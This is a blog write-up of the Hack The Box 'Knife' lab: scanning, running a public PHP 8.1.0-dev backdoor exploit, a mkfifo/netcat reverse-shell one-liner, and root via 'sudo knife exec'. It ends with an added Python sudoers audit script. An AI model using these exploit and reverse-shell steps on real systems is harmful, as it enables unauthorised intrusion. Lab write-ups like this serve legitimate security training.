Lluna's Pure land.

What is life like when singing to wine?


HTB-knife

0x00. Overview

0x01. Information gathering

Only ports 22 and 80 are open.

┌──(root💀kali)-[~/htb/knife]
└─# nmap -sC -sV -sT 10.10.10.242 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 02:30 EDT
Nmap scan report for 10.10.10.242
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.03 seconds

0x02. Visiting port 80

Crawling the site by hand turns up nothing.

0x03. Directory enumeration

Nothing here either.

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.10.242 -w /usr/share/wordlists/dirb/common.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/29 02:50:15 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 5815]
/server-status (Status: 403) [Size: 277]

===============================================================
2021/07/29 02:53:11 Finished
===============================================================

0x04. Web fingerprinting

PHP/8.1.0-dev is detected; a vulnerability in this build was disclosed just recently, see the reference for details.

┌──(root💀kali)-[~/htb/knife]
└─# whatweb http://10.10.10.242/ 130 ⨯
http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]

0x05. Searching exploit-db

0x06. Download and exploit

wget https://www.exploit-db.com/raw/49933
mv 49933 php8.1.0.rce.py
┌──(root💀kali)-[~/htb/knife]
└─# python3 php8.1.0.rce.py
Enter the full host url:
http://10.10.10.242

Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$ whoami
james

$ pwd
/

$ cat /home/james/user.txt
**********************

$

0x07. Privilege escalation

01. Reverse shell

This shell is too ugly to work in, so throw a reverse shell back; start the listener on Kali first.

┌──(root💀kali)-[~]
└─# nc -nvlp 6666
listening on [any] 6666 ...

Run on the target host:

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f

The shell comes back:

┌──(root💀kali)-[~]
└─# nc -nvlp 6666 1 ⨯
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.242] 34644
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
$

02. Privilege escalation via sudo -l

sudo -l reveals the knife command (hence the box name... 🏴🏴🏴🏴🏴🏴)

$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
$

Running knife with no arguments shows its options and info; the output is long, so only the exec section is listed here.

$ knife
ERROR: You need to pass a sub-command (e.g., knife SUB-COMMAND)

Usage: knife sub-command (options)
-s, --server-url URL Chef Infra Server URL.
--chef-zero-host HOST Host to start Chef Infra Zero on.
--chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
-k, --key KEY Chef Infra Server API client key.
--[no-]color Use colored output, defaults to enabled.
-c, --config CONFIG The configuration file to use.
--config-option OPTION=VALUE Override a single configuration option.
--defaults Accept default values for all questions.
-d, --disable-editing Do not open EDITOR, just accept the data as is.
-e, --editor EDITOR Set the editor to use for interactive commands.
-E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
--[no-]fips Enable FIPS mode.
-F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
--[no-]listen Whether a local mode (-z) server binds to a port.
-z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
-u, --user USER Chef Infra Server API client username.
--print-after Show the data after a destructive operation.
--profile PROFILE The credentials profile to select.
-V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
-v, --version Show Chef Infra Client version.
-y, --yes Say yes to all prompts for confirmation.
-h, --help Show this help message.

Available subcommands: (for details, knife SUB-COMMAND --help)

************

** EXEC COMMANDS **
knife exec [SCRIPT] (options)

** GOOGLE COMMANDS **
knife google disk create NAME --gce-disk-size N (options)
knife google disk delete NAME [NAME] (options)
knife google disk list
knife google image list
knife google project quotas
knife google region list
knife google region quotas
knife google server create NAME -m MACHINE_TYPE -I IMAGE (options)
knife google server delete INSTANCE_NAME [INSTANCE_NAME] (options)
knife google server list
knife google server show INSTANCE_NAME (options)
knife google zone list

***************************************
** YAML COMMANDS **
knife yaml convert YAML_FILENAME [RUBY_FILENAME]

$

knife reference

Privilege escalation

$ sudo knife exec --exec "exec '/bin/bash -i'"
bash: cannot set terminal process group (967): Inappropriate ioctl for device
bash: no job control in this shell
root@knife:/home/james#
root@knife:/home/james# cd
cd
root@knife:~# ls
ls
delete.sh
root.txt
snap
root@knife:~# cat root.txt
cat root.txt
***************************
root@knife:~#
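As an added example (not part of the original writeup), a small sudoers audit from the defender's side: it parses `sudo -l` output like the one shown above and flags rules that let a user run a shell-capable binary as root without a password, which is exactly the misconfiguration this box turns on. The sample output, the non-exhaustive `SHELL_CAPABLE` list and the function names are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the `sudo -l` output from this writeup, plus two extra
# rules so that the audit has something to accept and something to ignore.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/apt-get
    (ALL) NOPASSWD: /usr/bin/less
"""

# Binaries whose normal interface can run an arbitrary command, so a sudo rule
# for them is effectively a sudo rule for a shell. knife is here because its
# `exec` subcommand evaluates arbitrary Ruby (assumed, non-exhaustive list).
SHELL_CAPABLE = {"knife", "vim", "vi", "less", "more", "man", "find", "awk",
                 "perl", "python", "python3", "ruby", "bash", "sh", "env"}

# "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:\w+:\s*)*)(.+?)\s*$")


def parse_sudo_l(output: str) -> List[Tuple[str, List[str], str]]:
    """Return (runas, tags, command) tuples from `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # rule lines follow this header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = [t.strip() for t in m.group(2).split(":") if t.strip()]
            rules.append((m.group(1), tags, m.group(3)))
    return rules


def audit(output: str) -> List[Dict[str, str]]:
    """Flag rules combining root/ALL, NOPASSWD and a shell-capable binary."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        runas_user = runas.split(":")[0].strip()   # "(root : root)" -> root
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas_user in {"root", "ALL"} and "NOPASSWD" in tags and binary in SHELL_CAPABLE:
            findings.append({"binary": binary, "command": cmd, "runas": runas_user})
    return findings
```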

------------- The paper is short but the feeling is long; see you next time -------------